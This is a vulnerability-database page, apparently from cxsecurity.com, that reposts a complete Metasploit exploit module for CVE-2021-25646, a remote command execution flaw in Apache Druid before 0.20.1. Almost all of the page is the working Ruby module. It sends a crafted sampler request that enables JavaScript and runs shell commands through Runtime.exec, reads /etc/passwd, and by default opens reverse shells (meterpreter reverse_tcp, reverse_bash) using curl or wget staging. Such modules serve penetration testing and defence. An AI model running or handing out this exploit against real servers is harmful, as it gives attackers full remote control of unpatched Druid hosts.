Apache Druid 0.20.0 Remote Command Execution

2021.04.27
Credit: Litch1
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Apache Druid 0.20.0 Remote Command Execution', 'Description' => %q{ Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests; however, that feature is disabled by default. In Druid versions prior to `0.20.1`, an authenticated user can send a specially-crafted request that both enables the JavaScript code-execution feature and executes the supplied code all at once, allowing for code execution on the server with the privileges of the Druid Server process. More critically, authentication is not enabled in Apache Druid by default. Tested on the following Apache Druid versions: * 0.15.1 * 0.16.0-iap8 * 0.17.1 * 0.18.0-iap3 * 0.19.0-iap7 * 0.20.0-iap4.1 * 0.20.0 * 0.21.0-iap3 }, 'Author' => [ 'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery 'je5442804' # Metasploit module ], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'References' => [ ['CVE', '2021-25646'], ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646'], ['URL', 'https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E'], ['URL', 'https://github.com/yaunsky/cve-2021-25646/blob/main/cve-2021-25646.py'] ], 'DisclosureDate' => '2021-01-21', 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], 'Targets' => [ [ 'Linux (dropper)', { 'Platform' => 'linux', 'Type' => :linux_dropper, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'curl' }, 'CmdStagerFlavor' => %w[curl wget], 'Arch' => [ARCH_X86, ARCH_X64] } ], [ 'Unix (in-memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], ], 'DefaultTarget' => 0, 'Privileged' => false, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options([ Opt::RPORT(8888), OptString.new('TARGETURI', [true, 'The base path of Apache Druid', '/']) ]) end def execute_command(cmd, _opts = {}) gencmd = '/bin/sh`@~-c`@~' + cmd genvar = Rex::Text.rand_text_alpha(8..12) genname = Rex::Text.rand_text_alpha(8..12) vprint_status("cmd= #{gencmd} var=#{genvar} name=#{genname}") post_data = { type: 'index', spec: { ioConfig: { type: 'index', firehose: { type: 'local', baseDir: '/etc', filter: 'passwd' } }, dataSchema: { dataSource: Rex::Text.rand_text_alpha(8..12), parser: { parseSpec: { format: 'javascript', timestampSpec: {}, dimensionsSpec: {}, function: "function(){var #{genvar} = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"#{gencmd}\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"#{rand(1..9999999)}\",#{genname}: #{genvar}}}", "": { enabled: 'true' } } } } }, samplerConfig: { numRows: 10 } }.to_json send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/druid/indexer/v1/sampler'), 'ctype' => 'application/json', 'headers' => { 'Accept' => 'application/json, text/plain, */*' }, 'data' => post_data }) end def check genecho = Rex::Text.rand_text_alphanumeric(16..32).gsub(/A/, 'a') vprint_status("Attempting to execute 'echo #{genecho}' on the target.") res = execute_command("echo #{genecho}") unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 return CheckCode::Safe end if res.body.include?(genecho) return CheckCode::Vulnerable end CheckCode::Unknown('Target does not seem to be running Apache Druid.') end def exploit case target['Type'] when :linux_dropper execute_cmdstager when :unix_memory execute_command(payload.encoded) end end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top